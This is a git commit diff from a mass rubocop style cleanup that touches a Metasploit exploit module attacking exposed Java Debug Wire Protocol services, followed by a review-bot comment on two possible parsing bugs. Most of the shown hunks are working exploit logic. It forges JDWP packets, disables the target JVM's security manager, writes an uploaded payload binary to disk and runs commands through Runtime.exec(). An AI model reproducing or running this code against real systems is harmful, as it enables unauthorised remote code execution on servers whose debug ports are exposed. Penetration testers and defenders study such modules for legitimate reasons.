Mass rubocop changes

Spencer McIntyre
2025-12-17 17:11:13 -05:00
parent d4b196b309
commit 602adeb4c5
237 changed files with 4505 additions and 4446 deletions
+143 -145
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
HANDSHAKE = "JDWP-Handshake"
HANDSHAKE = 'JDWP-Handshake'
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
@@ -146,12 +146,12 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Forges packet for JDWP protocol
def create_packet(cmdsig, data = "")
def create_packet(cmdsig, data = '')
flags = 0x00
cmdset, cmd = cmdsig
pktlen = data.length + 11
buf = [pktlen, @my_id, flags, cmdset, cmd]
pkt = buf.pack("NNCCC")
pkt = buf.pack('NNCCC')
pkt << data
@my_id += 2
pkt
@@ -165,12 +165,12 @@ class MetasploitModule < Msf::Exploit::Remote
if pkt_len < 4
fail_with(Failure::Unknown, "#{peer} - Received corrupted response")
end
id, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
_, flags, err_code = sock.get_once(7, timeout).unpack('NCn')
if err_code != 0 && flags == REPLY_PACKET_TYPE
fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{err_code}")
end
response = ""
response = ''
while response.length + 11 < pkt_len
partial = sock.get_once(pkt_len, timeout)
fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless partial
@@ -184,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
def solve_string(data)
sock.put(create_packet(STRINGVALUE_SIG, data))
response = read_reply
return "" unless response
return '' unless response
return read_string(response)
end
@@ -200,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf = build_string(data)
sock.put(create_packet(CREATESTRING_SIG, buf))
buf = read_reply
return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false)
return parse_entries(buf, [[@vars['objectid_size'], 'obj_id']], false)
end
# Packs normal string into string structure for target VM
@@ -213,24 +213,24 @@ class MetasploitModule < Msf::Exploit::Remote
# Pack Integer for JDWP protocol
def format(fmt, value)
if fmt == "L" || fmt == 8
if fmt == 'L' || fmt == 8
return [value].pack('Q>')
elsif fmt == "I" || fmt == 4
elsif fmt == 'I' || fmt == 4
return [value].pack('N')
end
fail_with(Failure::Unknown, "Unknown format")
fail_with(Failure::Unknown, 'Unknown format')
end
# Unpack Integer from JDWP protocol
def unformat(fmt, value)
if fmt == "L" || fmt == 8
if fmt == 'L' || fmt == 8
return value[0..7].unpack('Q>')[0]
elsif fmt == "I" || fmt == 4
elsif fmt == 'I' || fmt == 4
return value[0..3].unpack('N')[0]
end
fail_with(Failure::Unknown, "Unknown format")
fail_with(Failure::Unknown, 'Unknown format')
end
# Parses given data according to a set of formats
@@ -253,20 +253,20 @@ class MetasploitModule < Msf::Exploit::Remote
data = {}
formats.each do |fmt, name|
if fmt == "L" || fmt == 8
if fmt == 'L' || fmt == 8
data[name] = buf[index, 8].unpack('Q>')[0]
index += 8
elsif fmt == "I" || fmt == 4
elsif fmt == 'I' || fmt == 4
data[name] = buf[index, 4].unpack('N')[0]
index += 4
elsif fmt == "S"
elsif fmt == 'S'
data_len = buf[index, 4].unpack('N')[0]
data[name] = buf[index + 4, data_len]
index += 4 + data_len
elsif fmt == "C"
elsif fmt == 'C'
data[name] = buf[index].unpack('C')[0]
index += 1
elsif fmt == "Z"
elsif fmt == 'Z'
t = buf[index].unpack('C')[0]
if t == 115
data[name] = solve_string(buf[index + 1, 8])
@@ -275,7 +275,7 @@ class MetasploitModule < Msf::Exploit::Remote
data[name], buf = buf[index + 1, 4].unpack('NN')
end
else
fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
fail_with(Failure::UnexpectedReply, 'Unexpected data when parsing server response')
end
end
entries.append(data)
@@ -287,11 +287,11 @@ class MetasploitModule < Msf::Exploit::Remote
# Gets the sizes of variably-sized data types in the target VM
def get_sizes
formats = [
["I", "fieldid_size"],
["I", "methodid_size"],
["I", "objectid_size"],
["I", "referencetypeid_size"],
["I", "frameid_size"]
['I', 'fieldid_size'],
['I', 'methodid_size'],
['I', 'objectid_size'],
['I', 'referencetypeid_size'],
['I', 'frameid_size']
]
sock.put(create_packet(IDSIZES_SIG))
response = read_reply
@@ -302,11 +302,11 @@ class MetasploitModule < Msf::Exploit::Remote
# Gets the JDWP version implemented by the target VM
def get_version
formats = [
["S", "descr"],
["I", "jdwp_major"],
["I", "jdwp_minor"],
["S", "vm_version"],
["S", "vm_name"]
['S', 'descr'],
['I', 'jdwp_major'],
['I', 'jdwp_minor'],
['S', 'vm_version'],
['S', 'vm_name']
]
sock.put(create_packet(VERSION_SIG))
response = read_reply
@@ -315,7 +315,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def version
"#{@vars["vm_name"]} - #{@vars["vm_version"]}"
"#{@vars['vm_name']} - #{@vars['vm_version']}"
end
# Returns reference for all threads currently running on target VM
@@ -325,7 +325,7 @@ class MetasploitModule < Msf::Exploit::Remote
num_threads = response.unpack('N').first
index = 4
size = @vars["objectid_size"]
size = @vars['objectid_size']
num_threads.times do
t_id = unformat(size, response[index, size])
@threads[t_id] = nil
@@ -338,10 +338,10 @@ class MetasploitModule < Msf::Exploit::Remote
return unless @classes.empty?
formats = [
["C", "reftype_tag"],
[@vars["referencetypeid_size"], "reftype_id"],
["S", "signature"],
["I", "status"]
['C', 'reftype_tag'],
[@vars['referencetypeid_size'], 'reftype_id'],
['S', 'signature'],
['I', 'status']
]
sock.put(create_packet(ALLCLASSES_SIG))
response = read_reply
@@ -352,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote
def get_class_by_name(name)
@classes.each do |entry_array|
entry_array.each do |entry|
if entry["signature"].downcase == name.downcase
if entry['signature'].downcase == name.downcase
return entry
end
end
@@ -369,12 +369,12 @@ class MetasploitModule < Msf::Exploit::Remote
end
formats = [
[@vars["methodid_size"], "method_id"],
["S", "name"],
["S", "signature"],
["I", "mod_bits"]
[@vars['methodid_size'], 'method_id'],
['S', 'name'],
['S', 'signature'],
['I', 'mod_bits']
]
ref_id = format(@vars["referencetypeid_size"], reftype_id)
ref_id = format(@vars['referencetypeid_size'], reftype_id)
sock.put(create_packet(METHODS_SIG, ref_id))
response = read_reply
@methods[reftype_id] = parse_entries(response, formats)
@@ -383,12 +383,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Returns information for each field in a reference type (ie. object)
def get_fields(reftype_id)
formats = [
[@vars["fieldid_size"], "field_id"],
["S", "name"],
["S", "signature"],
["I", "mod_bits"]
[@vars['fieldid_size'], 'field_id'],
['S', 'name'],
['S', 'signature'],
['I', 'mod_bits']
]
ref_id = format(@vars["referencetypeid_size"], reftype_id)
ref_id = format(@vars['referencetypeid_size'], reftype_id)
sock.put(create_packet(FIELDS_SIG, ref_id))
response = read_reply
fields = parse_entries(response, formats)
@@ -400,19 +400,19 @@ class MetasploitModule < Msf::Exploit::Remote
# or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced;
# for example, the values of private fields can be obtained.
def get_value(reftype_id, field_id)
data = format(@vars["referencetypeid_size"], reftype_id)
data = format(@vars['referencetypeid_size'], reftype_id)
data << [1].pack('N')
data << format(@vars["fieldid_size"], field_id)
data << format(@vars['fieldid_size'], field_id)
sock.put(create_packet(GETVALUES_SIG, data))
response = read_reply
num_values = response.unpack('N')[0]
unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
fail_with(Failure::Unknown, "Bad response when getting value for field")
fail_with(Failure::Unknown, 'Bad response when getting value for field')
end
len = @vars["objectid_size"]
len = @vars['objectid_size']
value = unformat(len, response[5..-1])
value
@@ -424,10 +424,10 @@ class MetasploitModule < Msf::Exploit::Remote
# the field's type exactly. For object values, there must exist a widening reference conversion from the
# value's type to the field's type and the field's type must be loaded.
def set_value(reftype_id, field_id, value)
data = format(@vars["referencetypeid_size"], reftype_id)
data = format(@vars['referencetypeid_size'], reftype_id)
data << [1].pack('N')
data << format(@vars["fieldid_size"], field_id)
data << format(@vars["objectid_size"], value)
data << format(@vars['fieldid_size'], field_id)
data << format(@vars['objectid_size'], value)
sock.put(create_packet(SETSTATICVALUES_SIG, data))
read_reply
@@ -437,11 +437,9 @@ class MetasploitModule < Msf::Exploit::Remote
def get_method_by_name(classname, name, signature = nil)
@methods[classname].each do |entry|
if signature.nil?
return entry if entry["name"].downcase == name.downcase
else
if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase
return entry
end
return entry if entry['name'].downcase == name.downcase
elsif entry['name'].downcase == name.downcase && entry['signature'].downcase == signature.downcase
return entry
end
end
@@ -455,8 +453,8 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found")
end
get_methods(target_class["reftype_id"])
target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature)
get_methods(target_class['reftype_id'])
target_method = get_method_by_name(target_class['reftype_id'], looked_method, signature)
unless target_method
fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found")
end
@@ -466,7 +464,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept")
def str_to_fq_class(s)
i = s.rindex(".")
i = s.rindex('.')
unless i
fail_with(Failure::BadConfig, 'Bad defined break class')
end
@@ -482,12 +480,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Gets the status of a given thread
def thread_status(thread_id)
sock.put(create_packet(THREADSTATUS_SIG, format(@vars["objectid_size"], thread_id)))
sock.put(create_packet(THREADSTATUS_SIG, format(@vars['objectid_size'], thread_id)))
buf = read_reply(datastore['BREAK_TIMEOUT'])
unless buf
fail_with(Failure::Unknown, "No network response")
fail_with(Failure::Unknown, 'No network response')
end
status, suspend_status = buf.unpack('NN')
status, = buf.unpack('NN')
status
end
@@ -497,12 +495,12 @@ class MetasploitModule < Msf::Exploit::Remote
if thread_id.nil?
sock.put(create_packet(RESUMEVM_SIG))
else
sock.put(create_packet(THREADRESUME_SIG, format(@vars["objectid_size"], thread_id)))
sock.put(create_packet(THREADRESUME_SIG, format(@vars['objectid_size'], thread_id)))
end
response = read_reply(datastore['BREAK_TIMEOUT'])
unless response
fail_with(Failure::Unknown, "No network response")
fail_with(Failure::Unknown, 'No network response')
end
response
@@ -513,12 +511,12 @@ class MetasploitModule < Msf::Exploit::Remote
if thread_id.nil?
sock.put(create_packet(SUSPENDVM_SIG))
else
sock.put(create_packet(THREADSUSPEND_SIG, format(@vars["objectid_size"], thread_id)))
sock.put(create_packet(THREADSUSPEND_SIG, format(@vars['objectid_size'], thread_id)))
end
response = read_reply
unless response
fail_with(Failure::Unknown, "No network response")
fail_with(Failure::Unknown, 'No network response')
end
response
@@ -545,7 +543,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Parses a received event and compares it with the expected
def parse_event(buf, event_id, thread_id)
len = @vars["objectid_size"]
len = @vars['objectid_size']
return false if buf.length < 10 + len - 1
r_id = buf[6..9].unpack('N')[0]
@@ -566,9 +564,9 @@ class MetasploitModule < Msf::Exploit::Remote
# superinterfaces, or implemented interfaces. Access control is not enforced; for example, private
# methods can be invoked.
def invoke_static(class_id, thread_id, meth_id, args = [])
data = format(@vars["referencetypeid_size"], class_id)
data << format(@vars["objectid_size"], thread_id)
data << format(@vars["methodid_size"], meth_id)
data = format(@vars['referencetypeid_size'], class_id)
data << format(@vars['objectid_size'], thread_id)
data << format(@vars['methodid_size'], meth_id)
data << [args.length].pack('N')
args.each do |arg|
@@ -585,10 +583,10 @@ class MetasploitModule < Msf::Exploit::Remote
# superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods
# can be invoked.
def invoke(obj_id, thread_id, class_id, meth_id, args = [])
data = format(@vars["objectid_size"], obj_id)
data << format(@vars["objectid_size"], thread_id)
data << format(@vars["referencetypeid_size"], class_id)
data << format(@vars["methodid_size"], meth_id)
data = format(@vars['objectid_size'], obj_id)
data << format(@vars['objectid_size'], thread_id)
data << format(@vars['referencetypeid_size'], class_id)
data << format(@vars['methodid_size'], meth_id)
data << [args.length].pack('N')
args.each do |arg|
@@ -604,9 +602,9 @@ class MetasploitModule < Msf::Exploit::Remote
# Creates a new object of specified class, invoking the specified constructor. The constructor
# method ID must be a member of the class type.
def create_instance(class_id, thread_id, meth_id, args = [])
data = format(@vars["referencetypeid_size"], class_id)
data << format(@vars["objectid_size"], thread_id)
data << format(@vars["methodid_size"], meth_id)
data = format(@vars['referencetypeid_size'], class_id)
data << format(@vars['objectid_size'], thread_id)
data << format(@vars['methodid_size'], meth_id)
data << [args.length].pack('N')
args.each do |arg|
@@ -621,13 +619,13 @@ class MetasploitModule < Msf::Exploit::Remote
# Creates a byte[]
def create_array(len)
target_class = get_class_by_name("[B")
fail_with(Failure::Unknown, "target_class is nil") if target_class.nil?
target_class = get_class_by_name('[B')
fail_with(Failure::Unknown, 'target_class is nil') if target_class.nil?
type_id = target_class["reftype_id"]
fail_with(Failure::Unknown, "type_id is nil") if type_id.nil?
type_id = target_class['reftype_id']
fail_with(Failure::Unknown, 'type_id is nil') if type_id.nil?
data = format(@vars["referencetypeid_size"], type_id)
data = format(@vars['referencetypeid_size'], type_id)
data << [len].pack('N')
sock.put(create_packet(ARRAYNEWINSTANCE_SIG, data))
@@ -637,7 +635,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Initializes the byte[] with values
def set_values(obj_id, args = [])
data = format(@vars["objectid_size"], obj_id)
data = format(@vars['objectid_size'], obj_id)
data << [0].pack('N')
data << [args.length].pack('N')
@@ -661,7 +659,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Configures payload according to targeted architecture
def setup_payload
# 1. Setting up generic values.
payload_exe = rand_text_alphanumeric(4 + rand(4))
payload_exe = rand_text_alphanumeric(rand(4..7))
pl_exe = generate_payload_exe
# 2. Setting up arch specific...
@@ -686,41 +684,41 @@ class MetasploitModule < Msf::Exploit::Remote
# Invokes java.lang.System.getProperty() for OS fingerprinting purposes
def fingerprint_os(thread_id)
size = @vars["objectid_size"]
size = @vars['objectid_size']
# 1. Creates a string on target VM with the property to be getted
cmd_obj_ids = create_string("os.name")
fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
cmd_obj_ids = create_string('os.name')
fail_with(Failure::Unknown, 'Failed to allocate string for payload dumping') if cmd_obj_ids.length == 0
cmd_obj_id = cmd_obj_ids[0]['obj_id']
# 2. Gets property
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
runtime_class, runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty")
buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C')
runtime_class, runtime_meth = get_class_and_method('Ljava/lang/System;', 'getProperty')
buf = invoke_static(runtime_class['reftype_id'], thread_id, runtime_meth['method_id'], data_array)
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected String') unless buf[0] == [TAG_STRING].pack('C')
str = unformat(size, buf[1..1 + size - 1])
@os = solve_string(format(@vars["objectid_size"], str))
@os = solve_string(format(@vars['objectid_size'], str))
end
# Creates a file on the server given a execution thread
def create_file(thread_id, filename)
cmd_obj_ids = create_string(filename)
fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0
fail_with(Failure::Unknown, 'Failed to allocate string for filename') if cmd_obj_ids.length == 0
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
size = @vars["objectid_size"]
cmd_obj_id = cmd_obj_ids[0]['obj_id']
size = @vars['objectid_size']
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V")
buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C')
runtime_class, runtime_meth = get_class_and_method('Ljava/io/FileOutputStream;', '<init>', '(Ljava/lang/String;)V')
buf = create_instance(runtime_class['reftype_id'], thread_id, runtime_meth['method_id'], data_array)
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Object') unless buf[0] == [TAG_OBJECT].pack('C')
file = unformat(size, buf[1..1 + size - 1])
fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0)
fail_with(Failure::Unknown, 'Failed to create file. Try to change the TMP_PATH') if file.nil? || (file == 0)
register_files_for_cleanup(filename)
@@ -728,14 +726,14 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Stores the payload on a new string created in target VM
def upload_payload(thread_id, pl_exe)
size = @vars["objectid_size"]
def upload_payload(_thread_id, pl_exe)
size = @vars['objectid_size']
buf = create_array(pl_exe.length)
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Array") unless buf[0] == [TAG_ARRAY].pack('C')
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Array') unless buf[0] == [TAG_ARRAY].pack('C')
pl = unformat(size, buf[1..1 + size - 1])
fail_with(Failure::Unknown, "Failed to create byte array to store payload") if pl.nil? || (pl == 0)
fail_with(Failure::Unknown, 'Failed to create byte array to store payload') if pl.nil? || (pl == 0)
set_values(pl, pl_exe.bytes)
pl
@@ -743,62 +741,62 @@ class MetasploitModule < Msf::Exploit::Remote
# Dumps the payload on a opened server file given a execution thread
def dump_payload(thread_id, file, pl)
size = @vars["objectid_size"]
size = @vars['objectid_size']
data = [TAG_OBJECT].pack('C')
data << format(size, pl)
data_array = [data]
runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V")
buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array)
runtime_class, runtime_meth = get_class_and_method('Ljava/io/FileOutputStream;', 'write', '([B)V')
buf = invoke(file, thread_id, runtime_class['reftype_id'], runtime_meth['method_id'], data_array)
unless buf[0] == [TAG_VOID].pack('C')
fail_with(Failure::Unknown, "Exception while writing to file")
fail_with(Failure::Unknown, 'Exception while writing to file')
end
end
# Closes a file on the server given a execution thread
def close_file(thread_id, file)
runtime_class, runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close")
buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"])
runtime_class, runtime_meth = get_class_and_method('Ljava/io/FileOutputStream;', 'close')
buf = invoke(file, thread_id, runtime_class['reftype_id'], runtime_meth['method_id'])
unless buf[0] == [TAG_VOID].pack('C')
fail_with(Failure::Unknown, "Exception while closing file")
fail_with(Failure::Unknown, 'Exception while closing file')
end
end
# Executes a system command on target VM making use of java.lang.Runtime.exec()
def execute_command(thread_id, cmd)
size = @vars["objectid_size"]
size = @vars['objectid_size']
# 1. Creates a string on target VM with the command to be executed
cmd_obj_ids = create_string(cmd)
if cmd_obj_ids.length == 0
fail_with(Failure::Unknown, "Failed to allocate string for payload dumping")
fail_with(Failure::Unknown, 'Failed to allocate string for payload dumping')
end
cmd_obj_id = cmd_obj_ids[0]["obj_id"]
cmd_obj_id = cmd_obj_ids[0]['obj_id']
# 2. Gets Runtime context
runtime_class, runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime")
buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"])
runtime_class, runtime_meth = get_class_and_method('Ljava/lang/Runtime;', 'getRuntime')
buf = invoke_static(runtime_class['reftype_id'], thread_id, runtime_meth['method_id'])
unless buf[0] == [TAG_OBJECT].pack('C')
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Object')
end
rt = unformat(size, buf[1..1 + size - 1])
if rt.nil? || (rt == 0)
fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()")
fail_with(Failure::Unknown, 'Failed to invoke Runtime.getRuntime()')
end
# 3. Finds and executes "exec" method supplying the string with the command
exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec")
exec_meth = get_method_by_name(runtime_class['reftype_id'], 'exec')
if exec_meth.nil?
fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()")
fail_with(Failure::BadConfig, 'Cannot find method Runtime.exec()')
end
data = [TAG_OBJECT].pack('C')
data << format(size, cmd_obj_id)
data_array = [data]
buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array)
buf = invoke(rt, thread_id, runtime_class['reftype_id'], exec_meth['method_id'], data_array)
unless buf[0] == [TAG_OBJECT].pack('C')
fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object")
fail_with(Failure::UnexpectedReply, 'Unexpected returned type: expected Object')
end
end
@@ -812,20 +810,20 @@ class MetasploitModule < Msf::Exploit::Remote
break
end
end
fail_with(Failure::Unknown, "Could not find a suitable thread for stepping") if t_id.nil?
fail_with(Failure::Unknown, 'Could not find a suitable thread for stepping') if t_id.nil?
# 2. Suspend the VM before setting the event
suspend_vm
vprint_status("Setting 'step into' event in thread: #{t_id}")
step_info = format(@vars["objectid_size"], t_id)
step_info = format(@vars['objectid_size'], t_id)
step_info << [STEP_MIN].pack('N')
step_info << [STEP_INTO].pack('N')
data = [[MODKIND_STEP, step_info]]
r_id = send_event(EVENT_STEP, data)
unless r_id
fail_with(Failure::Unknown, "Could not set the event")
fail_with(Failure::Unknown, 'Could not set the event')
end
return r_id, t_id
@@ -833,28 +831,28 @@ class MetasploitModule < Msf::Exploit::Remote
# Disables security manager if it's set on target JVM
def disable_sec_manager
sys_class = get_class_by_name("Ljava/lang/System;")
sys_class = get_class_by_name('Ljava/lang/System;')
fields = get_fields(sys_class["reftype_id"])
fields = get_fields(sys_class['reftype_id'])
sec_field = nil
fields.each do |field|
sec_field = field["field_id"] if field["name"].downcase == "security"
sec_field = field['field_id'] if field['name'].downcase == 'security'
end
fail_with(Failure::Unknown, "Security attribute not found") if sec_field.nil?
fail_with(Failure::Unknown, 'Security attribute not found') if sec_field.nil?
value = get_value(sys_class["reftype_id"], sec_field)
value = get_value(sys_class['reftype_id'], sec_field)
if (value == 0)
print_good("Security manager was not set")
print_good('Security manager was not set')
else
set_value(sys_class["reftype_id"], sec_field, 0)
if get_value(sys_class["reftype_id"], sec_field) == 0
print_good("Security manager has been disabled")
set_value(sys_class['reftype_id'], sec_field, 0)
if get_value(sys_class['reftype_id'], sec_field) == 0
print_good('Security manager has been disabled')
else
print_good("Security manager has not been disabled, trying anyway...")
print_good('Security manager has not been disabled, trying anyway...')
end
end
end
@@ -903,25 +901,25 @@ class MetasploitModule < Msf::Exploit::Remote
connect
unless handshake == HANDSHAKE
fail_with(Failure::NotVulnerable, "JDWP Protocol not found")
fail_with(Failure::NotVulnerable, 'JDWP Protocol not found')
end
print_status("Retrieving the sizes of variable sized data types in the target VM...")
print_status('Retrieving the sizes of variable sized data types in the target VM...')
get_sizes
print_status("Getting the version of the target VM...")
print_status('Getting the version of the target VM...')
get_version
print_status("Getting all currently loaded classes by the target VM...")
print_status('Getting all currently loaded classes by the target VM...')
get_all_classes
print_status("Getting all running threads in the target VM...")
print_status('Getting all running threads in the target VM...')
get_all_threads
print_status("Setting 'step into' event...")
r_id, t_id = set_step_event
print_status("Resuming VM and waiting for an event...")
print_status('Resuming VM and waiting for an event...')
response = resume_vm
unless parse_event(response, r_id, t_id)
@@ -937,13 +935,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
vprint_status("Received matching event from thread #{t_id}")
print_status("Deleting step event...")
print_status('Deleting step event...')
clear_event(EVENT_STEP, r_id)
print_status("Disabling security manager if set...")
print_status('Disabling security manager if set...')
disable_sec_manager
print_status("Dropping and executing payload...")
print_status('Dropping and executing payload...')
exec_payload(t_id)
disconnect
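Review bot: The header read in the read_reply hunk, `_, flags, err_code = sock.get_once(7, timeout).unpack('NCn')`, still calls `unpack` directly on whatever `get_once` returns, so a timed-out read would raise NoMethodError rather than the `Failure::TimeoutExpired` that the body loop just below reports when `partial` is nil. Reading into a local and guarding it first, e.g. `hdr = sock.get_once(7, timeout)` followed by `fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless hdr && hdr.length == 7`, would make both reads fail the same way. The unchanged context line `data[name], buf = buf[index + 1, 4].unpack('NN')` in the parse_entries hunk also looks wrong: a 4-byte slice yields only one value for `'NN'`, so `buf` is presumably reassigned to nil and `index` is not advanced on that branch. Both methods begin or end outside the visible hunks, so these points rest on the shown lines only.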